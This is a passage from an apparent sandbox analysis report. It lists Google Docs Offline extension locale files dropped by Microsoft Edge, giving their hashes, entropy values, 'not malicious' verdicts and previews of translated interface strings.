SHA-512:	CC12D00C10B970189E90D47390EEB142359A8D6F3A9174C2EF3AE0118F09C88AB9B689D9773028834839A7DFAF3AAC6747BC1DCB23794A9F067281E20B8DC6EA
Malicious:	false
Preview:	{.. "createnew": {.. "message": "SUKURTI NAUJ.".. },.. "explanationofflinedisabled": {.. "message": "Esate neprisijung.. Jei norite naudoti .Google. dokumentus be interneto ry.io, pagrindiniame .Google. dokument. puslapyje eikite . nustatym. skilt. ir .junkite sinchronizavim. neprisijungus, kai kit. kart. b.site prisijung. prie interneto.".. },.. "explanationofflineenabled": {.. "message": "Esate neprisijung., bet vis tiek galite redaguoti pasiekiamus failus arba sukurti nauj..".. },.. "extdesc": {.. "message": "Redaguokite, kurkite ir per.i.r.kite savo dokumentus, skai.iuokles ir pristatymus . visk. darykite be prieigos prie interneto.".. },.. "extname": {.. "message": ".Google. dokumentai neprisijungus".. },.. "learnmore": {.. "message": "Su.inoti daugiau".. },.. "popuphelptext": {.. "message": "Ra.ykite, redaguokite ir bendradarbiaukite bet kurioje vietoje naudodami interneto ry.. arba

C:\Users\user\AppData\Local\Temp\scoped_dir8156_1747464646\CRX_INSTALL\_locales\lv\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	994
Entropy (8bit):	4.700308832360794
Encrypted:	false
SSDEEP:	24:1HAaJ7a/uNpoB/Y4vPnswSPkDzLKFQHpp//BpPDB:7J7a/uzQ/Y4vvswhDzDr/LDB
MD5:	A568A58817375590007D1B8ABCAEBF82
SHA1:	B0F51FE6927BB4975FC6EDA7D8A631BF0C1AB597
SHA-256:	0621DE9161748F45D53052ED8A430962139D7F19074C7FFE7223ECB06B0B87DB
SHA-512:	FCFBADEC9F73975301AB404DB6B09D31457FAC7CCAD2FA5BE348E1CAD6800F87CB5B56DE50880C55BBADB3C40423351A6B5C2D03F6A327D898E35F517B1C628C
Malicious:	false
Preview:	{.. "createnew": {.. "message": "IZVEIDOT JAUNU".. },.. "explanationofflinedisabled": {.. "message": "J.s esat bezsaist.. Lai lietotu pakalpojumu Google dokumenti bez interneta savienojuma, n.kamaj. reiz., kad ir izveidots savienojums ar internetu, atveriet Google dokumentu s.kumlapas iestat.jumu izv.lni un iesl.dziet sinhroniz.ciju bezsaist..".. },.. "explanationofflineenabled": {.. "message": "J.s esat bezsaist., ta.u varat redi..t pieejamos failus un izveidot jaunus.".. },.. "extdesc": {.. "message": "Redi..jiet, veidojiet un skatiet savus dokumentus, izkl.jlapas un prezent.cijas, neizmantojot savienojumu ar internetu.".. },.. "extname": {.. "message": "Google dokumenti bezsaist.".. },.. "learnmore": {.. "message": "Uzziniet vair.k".. },.. "popuphelptext": {.. "message": "Rakstiet, redi..jiet un sadarbojieties ar interneta savienojumu vai bez t. neatkar.gi no t., kur atrodaties.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir8156_1747464646\CRX_INSTALL\_locales\ml\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2091
Entropy (8bit):	4.358252286391144
Encrypted:	false
SSDEEP:	24:1HAnHdGc4LtGxVY6IuVzJkeNL5kP13a67wNcYP8j5PIaSTIjPU4ELFPCWJjMupV/:idGcyYPVtkAUl7wqziBsg9DbpN6XoN/
MD5:	4717EFE4651F94EFF6ACB6653E868D1A
SHA1:	B8A7703152767FBE1819808876D09D9CC1C44450
SHA-256:	22CA9415E294D9C3EC3384B9D08CDAF5164AF73B4E4C251559E09E529C843EA6
SHA-512:	487EAB4938F6BC47B1D77DD47A5E2A389B94E01D29849E38E96C95CABC7BD98679451F0E22D3FEA25C045558CD69FDDB6C4FEF7C581141F1C53C4AA17578D7F7
Malicious:	false
Preview:	{.. "createnew": {.. "message": "....... ............".. },.. "explanationofflinedisabled": {.. "message": "...... ........... ........... ............. ..... Google ....... ..........., Google ....... .......... ............. .... ...... ...... ... ............... .................... '.......... ................' .........".. },.. "explanationofflineenabled": {.. "message": "................., .......... ......... ....... ...... ..............

C:\Users\user\AppData\Local\Temp\scoped_dir8156_1747464646\CRX_INSTALL\_locales\mn\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2778
Entropy (8bit):	3.595196082412897
Encrypted:	false
SSDEEP:	48:Y943BFU1LQ4HwQLQ4LQhlmVQL3QUm6H6ZgFIcwn6Rs2ShpQ3IwjGLQSJ/PYoEQj8:I43BCymz8XNcfuQDXYN2sum
MD5:	83E7A14B7FC60D4C66BF313C8A2BEF0B
SHA1:	1CCF1D79CDED5D65439266DB58480089CC110B18
SHA-256:	613D8751F6CC9D3FA319F4B7EA8B2BD3BED37FD077482CA825929DD7C12A69A8
SHA-512:	3742E24FFC4B5283E6EE496813C1BDC6835630D006E8647D427C3DE8B8E7BF814201ADF9A27BFAB3ABD130B6FEC64EBB102AC0EB8DEDFE7B63D82D3E1233305D
Malicious:	false
Preview:	{"createnew":{"message":"\u0428\u0418\u041d\u0418\u0419\u0413 \u04ae\u04ae\u0421\u0413\u042d\u0425"},"explanationofflinedisabled":{"message":"\u0422\u0430 \u043e\u0444\u043b\u0430\u0439\u043d \u0431\u0430\u0439\u043d\u0430. Google \u0414\u043e\u043a\u044b\u0433 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u0433\u04af\u0439\u0433\u044d\u044d\u0440 \u0430\u0448\u0438\u0433\u043b\u0430\u0445\u044b\u043d \u0442\u0443\u043b\u0434 \u0434\u0430\u0440\u0430\u0430\u0433\u0438\u0439\u043d \u0443\u0434\u0430\u0430 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u044d\u0434 \u0445\u043e\u043b\u0431\u043e\u0433\u0434\u043e\u0445\u0434\u043e\u043e Google \u0414\u043e\u043a\u044b\u043d \u043d\u04af\u04af\u0440 \u0445\u0443\u0443\u0434\u0430\u0441\u043d\u0430\u0430\u0441 \u0442\u043e\u0445\u0438\u0440\u0433\u043e\u043e \u0434\u043e\u0442\u043e\u0440\u0445 \u043e\u0444\u043b\u0430\u0439\u043d \u0441\u0438\u043d\u043a\u0438\u0439\u0433 \u0438\u0434\u044d\u0432\u0445\u0436\u04af\u04af\u043b\u043d\u0

C:\Users\user\AppData\Local\Temp\scoped_dir8156_1747464646\CRX_INSTALL\_locales\mr\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1719
Entropy (8bit):	4.287702203591075
Encrypted:	false
SSDEEP:	48:65/5EKaDMw6pEf4I5+jSksOTJqQyrFO8C:65/5EKaAw6pEf4I5+vsOVqQyFO8C
MD5:	3B98C4ED8874A160C3789FEAD5553CFA
SHA1:	5550D0EC548335293D962AAA96B6443DD8ABB9F6
SHA-256:	ADEB082A9C754DFD5A9D47340A3DDCC19BF9C7EFA6E629A2F1796305F1C9A66F
SHA-512:	5139B6C6DF9459C7B5CDC08A98348891499408CD75B46519BA3AC29E99AAAFCC5911A1DEE6C3A57E3413DBD0FAE72D7CBC676027248DCE6364377982B5CE4151
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".... .... ...".. },.. "explanationofflinedisabled": {.. "message": "...... ...... ..... ......... ....... ....... ..... Google ....... ............, Google ....... .............. .......... .. ... ..... .... ...... ......... ...... ...... ...... .... .... ....".. },.. "explanationofflineenabled": {.. "message": "...... ...... ...., ..... ...... ...... ...... .... ....... ... ..... .... .... ... .....".. },.. "extdesc": {.. "message": "..... ..

C:\Users\user\AppData\Local\Temp\scoped_dir8156_1747464646\CRX_INSTALL\_locales\ms\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	936
Entropy (8bit):	4.457879437756106
Encrypted:	false
SSDEEP:	24:1HARXIqhmemNKsE27rhdfNLChtyo2JJ/YgTgin:iIqFC7lrDfNLCIBRzn
MD5:	7D273824B1E22426C033FF5D8D7162B7
SHA1:	EADBE9DBE5519BD60458B3551BDFC36A10049DD1
SHA-256:	2824CF97513DC3ECC261F378BFD595AE95A5997E9D1C63F5731A58B1F8CD54F9
SHA-512:	E5B611BBFAB24C9924D1D5E1774925433C65C322769E1F3B116254B1E9C69B6DF1BE7828141EEBBF7524DD179875D40C1D8F29C4FB86D663B8A365C6C60421A7
Malicious:	false
Preview:	{.. "createnew": {.. "message": "BUAT BAHARU".. },.. "explanationofflinedisabled": {.. "message": "Anda berada di luar talian. Untuk menggunakan Google Docs tanpa sambungan Internet, pergi ke tetapan di halaman utama Google Docs dan hidupkan penyegerakan luar talian apabila anda disambungkan ke Internet selepas ini.".. },.. "explanationofflineenabled": {.. "message": "Anda berada di luar talian, tetapi anda masih boleh mengedit fail yang tersedia atau buat fail baharu.".. },.. "extdesc": {.. "message": "Edit, buat dan lihat dokumen, hamparan dan pembentangan anda . kesemuanya tanpa akses Internet.".. },.. "extname": {.. "message": "Google Docs Luar Talian".. },.. "learnmore": {.. "message": "Ketahui Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit dan bekerjasama di mana-mana sahaja anda berada, dengan atau tanpa sambungan Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir8156_1747464646\CRX_INSTALL\_locales\my\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3830
Entropy (8bit):	3.5483353063347587
Encrypted:	false
SSDEEP:	48:Ya+Ivxy6ur1+j3P7Xgr5ELkpeCgygyOxONHO3pj6H57ODyOXOVp6:8Uspsj3P3ty2a66xl09
MD5:	342335A22F1886B8BC92008597326B24
SHA1:	2CB04F892E430DCD7705C02BF0A8619354515513
SHA-256:	243BEFBD6B67A21433DCC97DC1A728896D3A070DC20055EB04D644E1BB955FE7
SHA-512:	CD344D060E30242E5A4705547E807CE3CE2231EE983BB9A8AD22B3E7598A7EC87399094B04A80245AD51D039370F09D74FE54C0B0738583884A73F0C7E888AD8
Malicious:	false
Preview:	{"createnew":{"message":"\u1021\u101e\u1005\u103a \u1015\u103c\u102f\u101c\u102f\u1015\u103a\u101b\u1014\u103a"},"explanationofflinedisabled":{"message":"\u101e\u1004\u103a \u1021\u1031\u102c\u1037\u1016\u103a\u101c\u102d\u102f\u1004\u103a\u1038\u1016\u103c\u1005\u103a\u1014\u1031\u1015\u102b\u101e\u100a\u103a\u104b \u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u1019\u103e\u102f \u1019\u101b\u103e\u102d\u1018\u1032 Google Docs \u1000\u102d\u102f \u1021\u101e\u102f\u1036\u1038\u1015\u103c\u102f\u101b\u1014\u103a \u1014\u1031\u102c\u1000\u103a\u1010\u1005\u103a\u1000\u103c\u102d\u1019\u103a \u101e\u1004\u103a\u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u101e\u100a\u1037\u103a\u1021\u1001\u102b Google Docs \u1015\u1004\u103a\u1019\u1005\u102c\u1019\u103b\u1000\u103a\u1014\u103e\u102c\u101b\u103e\u102d \u1006\u1000\u103a\u1010\u1004\u103a\u1019\u103b\u102c\u1038\u101e\u102d\u102f\u1037\u1

C:\Users\user\AppData\Local\Temp\scoped_dir8156_1747464646\CRX_INSTALL\_locales\ne\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1898
Entropy (8bit):	4.187050294267571
Encrypted:	false
SSDEEP:	24:1HAmQ6ZSWfAx6fLMr48tE/cAbJtUZJScSIQoAfboFMiQ9pdvz48YgqG:TQ6W6MbkcAltUJxQdfbqQ9pp0gqG
MD5:	B1083DA5EC718D1F2F093BD3D1FB4F37
SHA1:	74B6F050D918448396642765DEF1AD5390AB5282
SHA-256:	E6ED0A023EF31705CCCBAF1E07F2B4B2279059296B5CA973D2070417BA16F790
SHA-512:	7102B90ABBE2C811E8EE2F1886A73B1298D4F3D5D05F0FFDB57CF78B9A49A25023A290B255BAA4895BB150B388BAFD9F8432650B8C70A1A9A75083FFFCD74F1A
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".... ....... .........".. },.. "explanationofflinedisabled": {.. "message": "..... ...... .......... .... ........ .... .... Google ........ ...... .... ..... ..... ... .......... ....... .... Google ........ .......... ..... .......... .. ...... ..... .... ..... ......... .. ..........".. },.. "explanationofflineenabled": {.. "message": "..... ...... ........., .. ..... ... ... ...... ....... ....... .. .... ....... ....

C:\Users\user\AppData\Local\Temp\scoped_dir8156_1747464646\CRX_INSTALL\_locales\nl\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	914
Entropy (8bit):	4.513485418448461
Encrypted:	false
SSDEEP:	12:1HASvgFARCBxNBv52/fXjOXl6W6ICBxeBvMzU1CSUJAO6SFAIVIbCBhZHdb1tvz+:1HABJx4X6QDwEzlm2uGvYzKU
MD5:	32DF72F14BE59A9BC9777113A8B21DE6
SHA1:	2A8D9B9A998453144307DD0B700A76E783062AD0
SHA-256:	F3FE1FFCB182183B76E1B46C4463168C746A38E461FD25CA91FF2A40846F1D61
SHA-512:	E0966F5CCA5A8A6D91C58D716E662E892D1C3441DAA5D632E5E843839BB989F620D8AC33ED3EDBAFE18D7306B40CD0C4639E5A4E04DA2C598331DACEC2112AAD
Malicious:	false
Preview:	{.. "createnew": {.. "message": "NIEUW MAKEN".. },.. "explanationofflinedisabled": {.. "message": "Je bent offline. Wil je Google Documenten zonder internetverbinding gebruiken, ga dan de volgende keer dat je verbinding met internet hebt naar 'Instellingen' op de homepage van Google Documenten en zet 'Offline synchronisatie' aan.".. },.. "explanationofflineenabled": {.. "message": "Je bent offline, maar je kunt nog wel beschikbare bestanden bewerken of nieuwe bestanden maken.".. },.. "extdesc": {.. "message": "Bewerk, maak en bekijk je documenten, spreadsheets en presentaties. Allemaal zonder internettoegang.".. },.. "extname": {.. "message": "Offline Documenten".. },.. "learnmore": {.. "message": "Meer informatie".. },.. "popuphelptext": {.. "message": "Overal schrijven, bewerken en samenwerken, met of zonder internetverbinding.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir8156_1747464646\CRX_INSTALL\_locales\no\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	878
Entropy (8bit):	4.4541485835627475
Encrypted:	false
SSDEEP:	24:1HAqwwrJ6wky68uk+NILxRGJwBvDyrj9V:nwwQwky6W+NwswVyT
MD5:	A1744B0F53CCF889955B95108367F9C8
SHA1:	6A5A6771DFF13DCB4FD425ED839BA100B7123DE0
SHA-256:	21CEFF02B45A4BFD60D144879DFA9F427949A027DD49A3EB0E9E345BD0B7C9A8
SHA-512:	F55E43F14514EECB89F6727A0D3C234149609020A516B193542B5964D2536D192F40CC12D377E70C683C269A1BDCDE1C6A0E634AA84A164775CFFE776536A961
Malicious:	false
Preview:	{.. "createnew": {.. "message": "OPPRETT NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du er uten nett. For . bruke Google Dokumenter uten internettilkobling, g. til innstillingene p. Google Dokumenter-nettsiden og sl. p. synkronisering uten nett neste gang du er koblet til Internett.".. },.. "explanationofflineenabled": {.. "message": "Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye.".. },.. "extdesc": {.. "message": "Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine . uten nettilgang.".. },.. "extname": {.. "message": "Google Dokumenter uten nett".. },.. "learnmore": {.. "message": "Finn ut mer".. },.. "popuphelptext": {.. "message": "Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir8156_1747464646\CRX_INSTALL\_locales\pa\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2766
Entropy (8bit):	3.839730779948262
Encrypted:	false
SSDEEP:	48:YEH6/o0iZbNCbDMUcipdkNtQjsGKIhO9aBjj/nxt9o5nDAj3:p6wbZbEbvJ8jQkIhO9aBjb/90Ab
MD5:	97F769F51B83D35C260D1F8CFD7990AF
SHA1:	0D59A76564B0AEE31D0A074305905472F740CECA
SHA-256:	BBD37D41B7DE6F93948FA2437A7699D4C30A3C39E736179702F212CB36A3133C
SHA-512:	D91F5E2D22FC2D7F73C1F1C4AF79DB98FCFD1C7804069AE9B2348CBC729A6D2DFF7FB6F44D152B0BDABA6E0D05DFF54987E8472C081C4D39315CEC2CBC593816
Malicious:	false
Preview:	{"createnew":{"message":"\u0a28\u0a35\u0a3e\u0a02 \u0a2c\u0a23\u0a3e\u0a13"},"explanationofflinedisabled":{"message":"\u0a24\u0a41\u0a38\u0a40\u0a02 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a39\u0a4b\u0964 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a15\u0a28\u0a48\u0a15\u0a36\u0a28 \u0a26\u0a47 \u0a2c\u0a3f\u0a28\u0a3e\u0a02 Google Docs \u0a28\u0a42\u0a70 \u0a35\u0a30\u0a24\u0a23 \u0a32\u0a08, \u0a05\u0a17\u0a32\u0a40 \u0a35\u0a3e\u0a30 \u0a1c\u0a26\u0a4b\u0a02 \u0a24\u0a41\u0a38\u0a40\u0a02 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a26\u0a47 \u0a28\u0a3e\u0a32 \u0a15\u0a28\u0a48\u0a15\u0a1f \u0a39\u0a4b\u0a35\u0a4b \u0a24\u0a3e\u0a02 Google Docs \u0a2e\u0a41\u0a71\u0a16 \u0a2a\u0a70\u0a28\u0a47 '\u0a24\u0a47 \u0a38\u0a48\u0a1f\u0a3f\u0a70\u0a17\u0a3e\u0a02 \u0a35\u0a3f\u0a71\u0a1a \u0a1c\u0a3e\u0a13 \u0a05\u0a24\u0a47 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a38\u0a3f\u0a70\u0a15 \u0a28\u0a42\u0a70 \u0a1a\u0a3e\u0a32\u0a42 \u0a15\u0a30\u0a4b\u0964"},"expla

C:\Users\user\AppData\Local\Temp\scoped_dir8156_1747464646\CRX_INSTALL\_locales\pl\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	978
Entropy (8bit):	4.879137540019932
Encrypted:	false
SSDEEP:	24:1HApiJiRelvm3wi8QAYcbm24sK+tFJaSDD:FJMx3whxYcbNp
MD5:	B8D55E4E3B9619784AECA61BA15C9C0F
SHA1:	B4A9C9885FBEB78635957296FDDD12579FEFA033
SHA-256:	E00FF20437599A5C184CA0C79546CB6500171A95E5F24B9B5535E89A89D3EC3D
SHA-512:	266589116EEE223056391C65808255EDAE10EB6DC5C26655D96F8178A41E283B06360AB8E08AC3857D172023C4F616EF073D0BEA770A3B3DD3EE74F5FFB2296B
Malicious:	false
Preview:	{.. "createnew": {.. "message": "UTW.RZ NOWY".. },.. "explanationofflinedisabled": {.. "message": "Jeste. offline. Aby korzysta. z Dokument.w Google bez po..czenia internetowego, otw.rz ustawienia na stronie g..wnej Dokument.w Google i w..cz synchronizacj. offline nast.pnym razem, gdy b.dziesz mie. dost.p do internetu.".. },.. "explanationofflineenabled": {.. "message": "Jeste. offline, ale nadal mo.esz edytowa. dost.pne pliki i tworzy. nowe.".. },.. "extdesc": {.. "message": "Edytuj, tw.rz i wy.wietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno.ci ..czenia si. z internetem.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Wi.cej informacji".. },.. "popuphelptext": {.. "message": "Pisz, edytuj i wsp..pracuj, gdziekolwiek jeste. . niezale.nie od tego, czy masz po..czenie z internetem.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir8156_1747464646\CRX_INSTALL\_locales\pt_BR\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	907
Entropy (8bit):	4.599411354657937
Encrypted:	false
SSDEEP:	12:1HASvgU30CBxNd6GwXOK1styCJ02OK9+4KbCBxed6X4LBAt4rXgUCSUuYDHIIQka:1HAcXlyCJ5+Tsz4LY4rXSw/Q+ftkC
MD5:	608551F7026E6BA8C0CF85D9AC11F8E3
SHA1:	87B017B2D4DA17E322AF6384F82B57B807628617
SHA-256:	A73EEA087164620FA2260D3910D3FBE302ED85F454EDB1493A4F287D42FC882F
SHA-512:	82F52F8591DB3C0469CC16D7CBFDBF9116F6D5B5D2AD02A3D8FA39CE1378C64C0EA80AB8509519027F71A89EB8BBF38A8702D9AD26C8E6E0F499BF7DA18BF747
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Voc. est. off-line. Para usar o Documentos Google sem conex.o com a Internet, na pr.xima vez que se conectar, acesse as configura..es na p.gina inicial do Documentos Google e ative a sincroniza..o off-line.".. },.. "explanationofflineenabled": {.. "message": "Voc. est. off-line, mas mesmo assim pode editar os arquivos dispon.veis ou criar novos arquivos.".. },.. "extdesc": {.. "message": "Edite, crie e veja seus documentos, planilhas e apresenta..es sem precisar de acesso . Internet.".. },.. "extname": {.. "message": "Documentos Google off-line".. },.. "learnmore": {.. "message": "Saiba mais".. },.. "popuphelptext": {.. "message": "Escreva, edite e colabore onde voc. estiver, com ou sem conex.o com a Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir8156_1747464646\CRX_INSTALL\_locales\pt_PT\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	914
Entropy (8bit):	4.604761241355716
Encrypted:	false
SSDEEP:	24:1HAcXzw8M+N0STDIjxX+qxCjKw5BKriEQFMJXkETs:zXzw0pKXbxqKw5BKri3aNY
MD5:	0963F2F3641A62A78B02825F6FA3941C
SHA1:	7E6972BEAB3D18E49857079A24FB9336BC4D2D48
SHA-256:	E93B8E7FB86D2F7DFAE57416BB1FB6EE0EEA25629B972A5922940F0023C85F90
SHA-512:	22DD42D967124DA5A2209DD05FB6AD3F5D0D2687EA956A22BA1E31C56EC09DEB53F0711CD5B24D672405358502E9D1C502659BB36CED66CAF83923B021CA0286
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est. offline. Para utilizar o Google Docs sem uma liga..o . Internet, aceda .s defini..es na p.gina inicial do Google Docs e ative a sincroniza..o offline da pr.xima vez que estiver ligado . Internet.".. },.. "explanationofflineenabled": {.. "message": "Est. offline, mas continua a poder editar os ficheiros dispon.veis ou criar novos ficheiros.".. },.. "extdesc": {.. "message": "Edite, crie e veja os documentos, as folhas de c.lculo e as apresenta..es, tudo sem precisar de aceder . Internet.".. },.. "extname": {.. "message": "Google Docs offline".. },.. "learnmore": {.. "message": "Saber mais".. },.. "popuphelptext": {.. "message": "Escreva edite e colabore onde quer que esteja, com ou sem uma liga..o . Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir8156_1747464646\CRX_INSTALL\_locales\ro\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	937
Entropy (8bit):	4.686555713975264
Encrypted:	false
SSDEEP:	24:1HA8dC6e6w+uFPHf2TFMMlecFpweWV4RE:pC6KvHf4plVweCx
MD5:	BED8332AB788098D276B448EC2B33351
SHA1:	6084124A2B32F386967DA980CBE79DD86742859E
SHA-256:	085787999D78FADFF9600C9DC5E3FF4FB4EB9BE06D6BB19DF2EEF8C284BE7B20
SHA-512:	22596584D10707CC1C8179ED3ABE46EF2C314CF9C3D0685921475944B8855AAB660590F8FA1CFDCE7976B4BB3BD9ABBBF053F61F1249A325FD0094E1C95692ED
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREEAZ. UN DOCUMENT".. },.. "explanationofflinedisabled": {.. "message": "E.ti offline. Pentru a utiliza Documente Google f.r. conexiune la internet, intr. .n set.rile din pagina principal. Documente Google .i activeaz. sincronizarea offline data viitoare c.nd e.ti conectat(.) la internet.".. },.. "explanationofflineenabled": {.. "message": "E.ti offline, dar po.i .nc. s. editezi fi.ierele disponibile sau s. creezi altele.".. },.. "extdesc": {.. "message": "Editeaz., creeaz. .i acceseaz. documente, foi de calcul .i prezent.ri - totul f.r. acces la internet.".. },.. "extname": {.. "message": "Documente Google Offline".. },.. "learnmore": {.. "message": "Afl. mai multe".. },.. "popuphelptext": {.. "message": "Scrie, editeaz. .i colaboreaz. oriunde ai fi, cu sau f.r. conexiune la internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir8156_1747464646\CRX_INSTALL\_locales\ru\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1337
Entropy (8bit):	4.69531415794894
Encrypted:	false
SSDEEP:	24:1HABEapHTEmxUomjsfDVs8THjqBK8/hHUg41v+Lph5eFTHQ:I/VdxUomjsre8Kh4Riph5eFU
MD5:	51D34FE303D0C90EE409A2397FCA437D
SHA1:	B4B9A7B19C62D0AA95D1F10640A5FBA628CCCA12
SHA-256:	BE733625ACD03158103D62BC0EEF272CA3F265AC30C87A6A03467481A177DAE3
SHA-512:	E8670DED44DC6EE30E5F41C8B2040CF8A463CD9A60FC31FA70EB1D4C9AC1A3558369792B5B86FA761A21F5266D5A35E5C2C39297F367DAA84159585C19EC492A
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".......".. },.. "explanationofflinedisabled": {.. "message": "..... ............ Google ......... ... ........., ............ . .... . ......... ............. . ......-...... . .......... .. ......... .........".. },.. "explanationofflineenabled": {.. "message": "... ........... . .......... .. ...... ......... ..... ..... . ............. .., . ....... ........ ......-.......".. },.. "extdesc": {.. "message": ".........., .............. . ............ ........., ....... . ........... ... ....... . ..........".. },.. "extname": {.. "message": "Google.......... ......".. },.. "learnmore": {.

C:\Users\user\AppData\Local\Temp\scoped_dir8156_1747464646\CRX_INSTALL\_locales\si\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2846
Entropy (8bit):	3.7416822879702547
Encrypted:	false
SSDEEP:	48:YWi+htQTKEQb3aXQYJLSWy7sTQThQTnQtQTrEmQ6kiLsegQSJFwsQGaiPn779I+S:zhiTK5b3tUGVjTGTnQiTryOLpyaxYf/S
MD5:	B8A4FD612534A171A9A03C1984BB4BDD
SHA1:	F513F7300827FE352E8ECB5BD4BB1729F3A0E22A
SHA-256:	54241EBE651A8344235CC47AFD274C080ABAEBC8C3A25AFB95D8373B6A5670A2
SHA-512:	C03E35BFDE546AEB3245024EF721E7E606327581EFE9EAF8C5B11989D9033BDB58437041A5CB6D567BAA05466B6AAF054C47F976FD940EEEDF69FDF80D79095B
Malicious:	false
Preview:	{"createnew":{"message":"\u0db1\u0dc0 \u0dbd\u0dda\u0d9b\u0db1\u0dba\u0d9a\u0dca \u0dc3\u0dcf\u0daf\u0db1\u0dca\u0db1"},"explanationofflinedisabled":{"message":"\u0d94\u0db6 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2\u0dba. \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd \u0dc3\u0db8\u0dca\u0db6\u0db1\u0dca\u0db0\u0dad\u0dcf\u0dc0\u0d9a\u0dca \u0db1\u0ddc\u0db8\u0dd0\u0dad\u0dd2\u0dc0 Google Docs \u0db7\u0dcf\u0dc0\u0dd2\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8\u0da7, Google Docs \u0db8\u0dd4\u0dbd\u0dca \u0db4\u0dd2\u0da7\u0dd4\u0dc0 \u0db8\u0dad \u0dc3\u0dd0\u0d9a\u0dc3\u0dd3\u0db8\u0dca \u0dc0\u0dd9\u0dad \u0d9c\u0ddc\u0dc3\u0dca \u0d94\u0db6 \u0d8a\u0dc5\u0d9f \u0d85\u0dc0\u0dc3\u0dca\u0dae\u0dcf\u0dc0\u0dda \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd\u0dba\u0da7 \u0dc3\u0db6\u0dd0\u0db3\u0dd2 \u0dc0\u0dd2\u0da7 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2 \u0dc3\u0db8\u0db8\u0dd4\u0dc4\u0dd4\u0dbb\u0dca\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8 \u0d9a\u0dca\u200d\u0dbb\u0dd2\u0dba\u0dc

C:\Users\user\AppData\Local\Temp\scoped_dir8156_1747464646\CRX_INSTALL\_locales\sk\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	934
Entropy (8bit):	4.882122893545996
Encrypted:	false
SSDEEP:	24:1HAF8pMv1RS4LXL22IUjdh8uJwpPqLDEtxKLhSS:hyv1RS4LXx38u36QsS
MD5:	8E55817BF7A87052F11FE554A61C52D5
